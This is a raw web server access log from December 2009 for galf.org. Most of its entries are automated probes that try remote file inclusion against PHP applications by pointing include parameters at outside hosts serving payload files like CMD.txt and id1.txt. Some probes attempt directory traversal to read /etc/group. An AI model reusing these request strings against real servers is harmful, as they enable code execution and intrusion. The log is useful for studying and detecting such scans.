222.231.1.32 - - [21/Dec/2009:00:16:10 -0800] "GET /logs/access_090713.log%20%20///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:00:16:48 -0800] "GET /logs/access.log/view.php?pg=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:16:48 -0800] "GET /view.php?pg=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:16:48 -0800] "GET /logs/view.php?pg=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:16:49 -0800] "GET /logs/access.log/index.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:16:49 -0800] "GET /index.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:16:49 -0800] "GET /logs/index.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:01 -0800] "GET /logs/view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:01 -0800] "GET /view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:04 -0800] "GET /logs/access.log/index.php?pg=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:04 -0800] "GET /index.php?pg=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:04 -0800] "GET /logs/index.php?pg=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
69.175.26.26 - - [21/Dec/2009:00:17:13 -0800] "GET /logs/access_091012.log%20%20//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:37 -0800] "GET /logs/access.log/view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
61.47.61.97 - - [21/Dec/2009:00:17:37 -0800] "GET /view.php?pg=http://www.thaisocial.net/~constitution/crawler_project/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "galf.org"
209.97.212.123 - - [21/Dec/2009:00:17:52 -0800] "GET /logs/access_090706.log//photoalb/lib/static/header.php?set_menu=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:00:17:52 -0800] "GET /logs/access_090706.log//photoalb/lib/static/header.php?set_menu=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:18:17 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:18:17 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:18:17 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.131.106.16 - - [21/Dec/2009:00:19:41 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [21/Dec/2009:00:19:42 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:00:21:11 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:00:21:11 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:23:26 -0800] "GET /logs/access_091102.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.25.101 - - [21/Dec/2009:00:23:37 -0800] "GET /logs/access_090713.log/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:24:03 -0800] "GET /logs/access_090706.log///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:24:03 -0800] "GET /logs/access_090706.log///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [21/Dec/2009:00:24:03 -0800] "GET /logs/access_090706.log///include/admin.lib.inc.php?site_path=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.25.101 - - [21/Dec/2009:00:24:29 -0800] "GET /logs/access_091109.log/xoopsgallery/poll/tools/send_reminders.php?noSet=0&includedir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:00:26:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [21/Dec/2009:00:26:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.106.157 - - [21/Dec/2009:00:32:07 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
81.176.226.186 - - [21/Dec/2009:00:33:19 -0800] "GET /logs/access_090511.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
81.176.226.186 - - [21/Dec/2009:00:33:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
81.176.226.186 - - [21/Dec/2009:00:33:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
65.55.106.157 - - [21/Dec/2009:00:33:41 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:34:06 -0800] "GET /logs//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:34:06 -0800] "GET /bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:34:06 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:35:18 -0800] "GET /logs/access_090706.log%20/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:35:18 -0800] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:35:18 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:41:12 -0800] "GET /logs/access_090921.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:41:57 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [21/Dec/2009:00:42:08 -0800] "GET /logs/access_090706.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
212.115.43.161 - - [21/Dec/2009:00:43:51 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
65.55.106.210 - - [21/Dec/2009:00:44:21 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.51.41.229 - - [21/Dec/2009:00:45:38 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
200.74.143.51 - - [21/Dec/2009:00:46:33 -0800] "GET /logs/access_091012.log%20%20//bbs//skin/ggambo7002_board/setup.php?dir=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:46:53 -0800] "GET /logs/access_090921.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:46:56 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:46:56 -0800] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:00:47:36 -0800] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.116.0.130 - - [21/Dec/2009:00:47:36 -0800] "GET /logs/access.log//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.116.0.130 - - [21/Dec/2009:00:47:36 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
99.198.97.170 - - [21/Dec/2009:00:47:43 -0800] "GET /logs/access_090706.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:47:57 -0800] "GET /logs/access_090921.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:48:00 -0800] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:48:02 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:00:48:03 -0800] "GET /logs/access_090706.log//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:00:48:03 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.116.0.130 - - [21/Dec/2009:00:48:03 -0800] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
72.51.41.229 - - [21/Dec/2009:00:48:19 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:48:48 -0800] "GET /logs/access_090706.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:48:54 -0800] "GET /logs/access_090706.log%20/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:48:57 -0800] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:48:57 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
212.115.43.161 - - [21/Dec/2009:00:49:45 -0800] "GET /logs/access_090622.log//modules/4nAlbum/public/displayCategory.php?basepath=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
212.115.43.161 - - [21/Dec/2009:00:49:45 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
212.115.43.161 - - [21/Dec/2009:00:49:45 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:52:51 -0800] "GET /logs/access_090921.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:00:53:39 -0800] "GET /logs/access_090706.log/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
72.51.41.229 - - [21/Dec/2009:01:01:23 -0800] "GET /logs/access_090706.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
72.51.41.229 - - [21/Dec/2009:01:01:28 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
72.51.41.229 - - [21/Dec/2009:01:01:29 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:02:28 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:02:28 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:02:28 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:03:40 -0800] "GET /?_zb_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:03:40 -0800] "GET /logs/access.log//?_zb_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:03:41 -0800] "GET /logs//?_zb_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:03:46 -0800] "GET /?_zb_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:04:01 -0800] "GET /logs//?_zb_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:04:01 -0800] "GET /logs/access.log//?_zb_path=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [21/Dec/2009:01:04:21 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:01:05:17 -0800] "GET /logs/access_090706.log%20/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:05:19 -0800] "GET /logs/access.log%20%20//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [21/Dec/2009:01:05:19 -0800] "GET /modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [21/Dec/2009:01:05:19 -0800] "GET /logs//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [21/Dec/2009:01:05:35 -0800] "GET /squito/photolist.inc.php?photoroot=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [21/Dec/2009:01:05:35 -0800] "GET /squito/photolist.inc.php?photoroot=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
99.198.97.170 - - [21/Dec/2009:01:05:53 -0800] "GET /logs/access_090706.log%20/faqsupport/samplefaqsupport.php?path[docroot]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
72.51.41.229 - - [21/Dec/2009:01:06:14 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
190.152.145.54 - - [21/Dec/2009:01:06:17 -0800] "GET /logs/access.log%20%20//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [21/Dec/2009:01:06:17 -0800] "GET /logs//modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [21/Dec/2009:01:06:17 -0800] "GET /modify.php?dir_module=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.51.41.229 - - [21/Dec/2009:01:06:19 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:07:49 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:07:49 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:07:54 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
67.19.51.194 - - [21/Dec/2009:01:08:07 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [21/Dec/2009:01:08:07 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [21/Dec/2009:01:08:07 -0800] "GET /logs/access.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:08 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:08 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:20 -0800] "GET /logs/access.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [21/Dec/2009:01:09:30 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:09:30 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [21/Dec/2009:01:09:30 -0800] "GET /logs/access_090706.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:31 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:32 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [21/Dec/2009:01:09:34 -0800] "GET /logs/access.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
